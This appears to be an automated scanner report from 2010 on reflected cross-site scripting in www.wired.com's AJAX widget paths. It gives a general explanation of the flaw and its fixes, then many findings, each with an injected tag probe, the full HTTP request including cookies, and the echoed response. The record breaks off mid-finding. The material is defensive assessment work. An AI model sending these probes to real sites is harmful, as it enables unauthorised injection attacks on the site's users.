Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e3bf"><a>5de4eb6055f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ajax9e3bf"><a>5de4eb6055f/widgets/related/content/blogPost/autopia_29989 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29389 Vary: Accept-Encoding Cache-Control: max-age=227 Expires: Mon, 22 Nov 2010 01:13:57 GMT Date: Mon, 22 Nov 2010 01:10:10 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_ajax9e3bf"><a>5de4eb6055f ss_widgets c_related"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b57b"><a>764ea10e8d2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ajax/widgets1b57b"><a>764ea10e8d2/related/content/blogPost/autopia_29989 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29389 Vary: Accept-Encoding Cache-Control: max-age=220 Expires: Mon, 22 Nov 2010 01:14:29 GMT Date: Mon, 22 Nov 2010 01:10:49 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_ajax ss_widgets1b57b"><a>764ea10e8d2 c_related"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf640"><a>99098f04c4b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ajax/widgets/relatedbf640"><a>99098f04c4b/content/blogPost/autopia_29989 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29389 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:15:05 GMT Date: Mon, 22 Nov 2010 01:11:05 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_ajax ss_widgets c_relatedbf640"><a>99098f04c4b"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f0d1"><a>9e67eb28264 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ajax8f0d1"><a>9e67eb28264/widgets/related/content/blogPost/epicenter_25377 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29391 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:14:27 GMT Date: Mon, 22 Nov 2010 01:10:27 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_ajax8f0d1"><a>9e67eb28264 ss_widgets c_related"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f855"><a>144ef7ca22 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ajax/widgets4f855"><a>144ef7ca22/related/content/blogPost/epicenter_25377 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29389 Vary: Accept-Encoding Cache-Control: max-age=233 Expires: Mon, 22 Nov 2010 01:14:45 GMT Date: Mon, 22 Nov 2010 01:10:52 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_ajax ss_widgets4f855"><a>144ef7ca22 c_related"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5558d"><a>877c7a8d468 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ajax/widgets/related5558d"><a>877c7a8d468/content/blogPost/epicenter_25377 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29391 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:15:11 GMT Date: Mon, 22 Nov 2010 01:11:11 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_ajax ss_widgets c_related5558d"><a>877c7a8d468"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e30b"><a>f706f81ec9d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ajax9e30b"><a>f706f81ec9d/widgets/related/content/blogPost/epicenter_25571 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29391 Vary: Accept-Encoding Cache-Control: max-age=219 Expires: Mon, 22 Nov 2010 01:14:06 GMT Date: Mon, 22 Nov 2010 01:10:27 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_ajax9e30b"><a>f706f81ec9d ss_widgets c_related"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4be84"><a>0968336159a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ajax/widgets4be84"><a>0968336159a/related/content/blogPost/epicenter_25571 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29391 Vary: Accept-Encoding Cache-Control: max-age=232 Expires: Mon, 22 Nov 2010 01:14:44 GMT Date: Mon, 22 Nov 2010 01:10:52 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_ajax ss_widgets4be84"><a>0968336159a c_related"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f77cf"><a>7b2d4dc85a2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ajax/widgets/relatedf77cf"><a>7b2d4dc85a2/content/blogPost/epicenter_25571 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29391 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:15:09 GMT Date: Mon, 22 Nov 2010 01:11:09 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_ajax ss_widgets c_relatedf77cf"><a>7b2d4dc85a2"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bbe51"><a>c45b8c7122 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ajaxbbe51"><a>c45b8c7122/widgets/related/content/blogPost/magazine_39648 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29388 Vary: Accept-Encoding Cache-Control: max-age=232 Expires: Mon, 22 Nov 2010 01:14:22 GMT Date: Mon, 22 Nov 2010 01:10:30 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_ajaxbbe51"><a>c45b8c7122 ss_widgets c_related"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 934e2"><a>e80de08ba2a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ajax/widgets934e2"><a>e80de08ba2a/related/content/blogPost/magazine_39648 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29390 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:14:55 GMT Date: Mon, 22 Nov 2010 01:10:55 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_ajax ss_widgets934e2"><a>e80de08ba2a c_related"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c6a5"><a>1a9008494ce was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ajax/widgets/related6c6a5"><a>1a9008494ce/content/blogPost/magazine_39648 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29390 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:15:13 GMT Date: Mon, 22 Nov 2010 01:11:13 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_ajax ss_widgets c_related6c6a5"><a>1a9008494ce"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc70a"><a>3b04f1e36da was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ajaxfc70a"><a>3b04f1e36da/widgets/related/content/blogPost/playbook_3021 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29389 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:14:34 GMT Date: Mon, 22 Nov 2010 01:10:34 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_ajaxfc70a"><a>3b04f1e36da ss_widgets c_related"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d30b"><a>fc5601b0c19 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ajax/widgets5d30b"><a>fc5601b0c19/related/content/blogPost/playbook_3021 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29389 Vary: Accept-Encoding Cache-Control: max-age=236 Expires: Mon, 22 Nov 2010 01:14:53 GMT Date: Mon, 22 Nov 2010 01:10:57 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_ajax ss_widgets5d30b"><a>fc5601b0c19 c_related"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f817"><a>9b3c8b9b37f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ajax/widgets/related4f817"><a>9b3c8b9b37f/content/blogPost/playbook_3021 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29389 Vary: Accept-Encoding Cache-Control: max-age=225 Expires: Mon, 22 Nov 2010 01:15:01 GMT Date: Mon, 22 Nov 2010 01:11:16 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_ajax ss_widgets c_related4f817"><a>9b3c8b9b37f"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3c31"><a>f807e40c9a9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /ajaxb3c31"><a>f807e40c9a9/widgets/related/content/blogPost/reviews_25843 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29389 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:14:23 GMT Date: Mon, 22 Nov 2010 01:10:23 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_ajaxb3c31"><a>f807e40c9a9 ss_widgets c_related"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 310b1"><a>8982e2d5c82 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
